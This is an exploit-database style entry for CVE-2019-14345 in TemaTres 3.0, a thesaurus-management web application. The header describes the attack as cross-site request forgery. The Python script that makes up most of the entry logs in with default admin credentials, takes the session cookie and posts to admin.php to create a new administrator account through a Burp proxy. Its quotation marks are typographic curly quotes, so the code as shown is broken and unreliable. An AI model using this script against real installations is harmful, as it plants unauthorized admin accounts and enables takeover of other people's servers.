TemaTres 3.0 - Cross-Site Request Forgery (Add Admin)

# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download
# Version: 3.0
# CVE : 2019–14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10

# Description:
# Web application for management formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.

#Exploit

import requests
import sys

session = requests.Session()

http_proxy = “http://127.0.0.1:8080"
https_proxy = “https://127.0.0.1:8080"

proxyDict = {
“http” : http_proxy,
“https” : https_proxy
}

url = ‘http://localhost/tematres/vocab/login.php'
values = {‘id_correo_electronico’: ‘[email protected]’,
‘id_password’: ‘admin’,
‘task’:’login’}

r = session.post(url, data=values, proxies=proxyDict)
cookie = session.cookies.get_dict()[‘PHPSESSID’]

print (cookie)

host = sys.argv[1]
user = input(‘[+]User:’)
lastname = input(‘[+]lastname:’)
password = input(‘[+]Password:’)
password2 = input(‘[+]Confirm Password:’)
email = input(‘[+]Email:’)

if (password == password2):
#configure proxy burp

data = {
‘_nombre’:user,
‘_apellido’:lastname,
‘_correo_electronico’:email,
‘orga’:’bypassed’,
‘_clave’:password,
‘_confirmar_clave’:password2,
‘isAdmin’:1,
‘boton’:’Guardar’,
‘userTask’:’A’,
‘useactua’:’’

}
headers= {
‘Cookie’: ‘PHPSESSID=’+cookie
}
request = session.post(host+’/tematres/vocab/admin.php’, data=data,
headers=headers, proxies=proxyDict)
print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’)
print(‘Status Code:’+ str(request.status_code))

else:
print (‘Passwords dont match!!!’)